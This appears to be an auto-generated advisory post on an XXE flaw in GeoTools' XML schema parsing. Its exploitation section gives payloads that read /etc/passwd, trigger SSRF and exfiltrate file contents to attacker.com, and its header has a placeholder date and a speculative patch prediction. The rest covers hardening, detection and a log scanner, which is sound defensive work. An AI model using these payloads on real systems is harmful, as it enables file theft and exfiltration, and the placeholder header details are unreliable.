How the CVE Works
The vulnerability arises in GeoTools’ `gt-xsd-core` due to improper handling of XML schemas via the Eclipse XSD library. When parsing XML documents referencing external schemas, the `Schemas` class fails to enforce the configured EntityResolver, allowing XXE attacks. Attackers can craft malicious XML payloads embedding external entities (e.g., `<!ENTITY xxe SYSTEM "file:///etc/passwd">`), leading to SSRF or local file exfiltration. The `gt-wfs-ng` DataStore exacerbates this by ignoring the `ENTITY_RESOLVER` parameter, leaving WFS (Web Feature Service) endpoints exposed.
DailyCVE Form
Platform: GeoTools
Version: <23.x
Vulnerability: XXE
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch by Q3 2023
What Undercode Say:
Exploitation
1. Payload Example:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <featureType><name>&xxe;</name></featureType>
2. SSRF via HTTP:
<!ENTITY xxe SYSTEM "http://attacker.com/malicious.xsd">
3. OOB Exfiltration:
<!ENTITY % payload SYSTEM "file:///confidential.txt"> <!ENTITY % oob "<!ENTITY &x25; exfil SYSTEM 'http://attacker.com/?leak=%payload;'>">
Protection
1. Disable DTDs:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Reject any DOCTYPE, so no entity declarations are ever parsed
2. Enforce EntityResolver:
Schemas.parse(location, new NoOpEntityResolver()); // Blocks external entities
3. GeoTools Patch:
<dependency>
  <groupId>org.geotools</groupId>
  <artifactId>gt-xsd-core</artifactId>
  <version>23.0+</version> <!-- Fixed version -->
</dependency>
Detection
1. Log Analysis:
grep -r "DOCTYPE" /var/log/geoserver/*.log
2. Network Monitoring:
tcpdump -i eth0 'dst port 80 and src host <geotools_server>'
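As an added example (not part of the original post), the log-analysis step above carried a bit further in Python: a scanner that flags the DTD constructs used by the payloads shown earlier and labels each external entity by what resolving it would do (file read, SSRF, or parameter-entity OOB exfiltration). The sample log lines, client IP addresses and the `/geoserver/wfs` path are constructed.

```python
import re

# DTD constructs that a legitimate WFS/GML request never needs.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "uri"> or <!ENTITY % name SYSTEM "uri">; PUBLIC carries a public id first.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))\s+"
    r"(?P<q>[\"'])(?P<uri>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)

def classify(param: bool, uri: str) -> str:
    """Label an external entity by what resolving it would do."""
    scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
    if param:
        return "oob-exfil"   # parameter entities are how leaked content gets smuggled out
    if scheme == "file":
        return "file-read"
    if scheme in ("http", "https", "ftp", "jar"):
        return "ssrf"
    return "external-entity"

def scan_request(body: str) -> list[tuple[str, str]]:
    """Return (kind, detail) for every DTD-based indicator in one request body."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append(("doctype", "DTD declaration in request"))
    for m in ENTITY_RE.finditer(body):
        kind = classify(bool(m.group("param")), m.group("uri"))
        findings.append((kind, f"{m.group('name')} -> {m.group('uri')}"))
    return findings

def triage_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Scan log lines (one request body per line); list hit line numbers with their indicator kinds."""
    hits = []
    for n, line in enumerate(lines, start=1):
        kinds = sorted({kind for kind, _ in scan_request(line)})
        if kinds:
            hits.append((n, kinds))
    return hits

# Constructed sample log lines: a benign GetFeature, then the three payload shapes from this post.
SAMPLE_LOG = [
    '203.0.113.5 POST /geoserver/wfs <wfs:GetFeature service="WFS"><wfs:Query typeName="topp:states"/></wfs:GetFeature>',
    '203.0.113.6 POST /geoserver/wfs <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><featureType><name>&xxe;</name></featureType>',
    '203.0.113.7 POST /geoserver/wfs <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.com/malicious.xsd"> ]><a>&xxe;</a>',
    '203.0.113.8 POST /geoserver/wfs <!DOCTYPE foo [ <!ENTITY % payload SYSTEM "file:///confidential.txt"> ]><a/>',
]
```

`triage_log(SAMPLE_LOG)` skips the benign line and reports lines 2 to 4 with their indicator kinds; it scans raw bodies, so URL-encoded or multi-line request logging needs decoding before the scan.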
Mitigation
- WAF Rules:
location /wfs { if ($args ~ "DOCTYPE") { return 403; } }
- Schema Validation:
SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // No protocols allowed for schema fetches
sf.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");    // Same for external DTDs and entities
References
Sources:
Reported By: github.com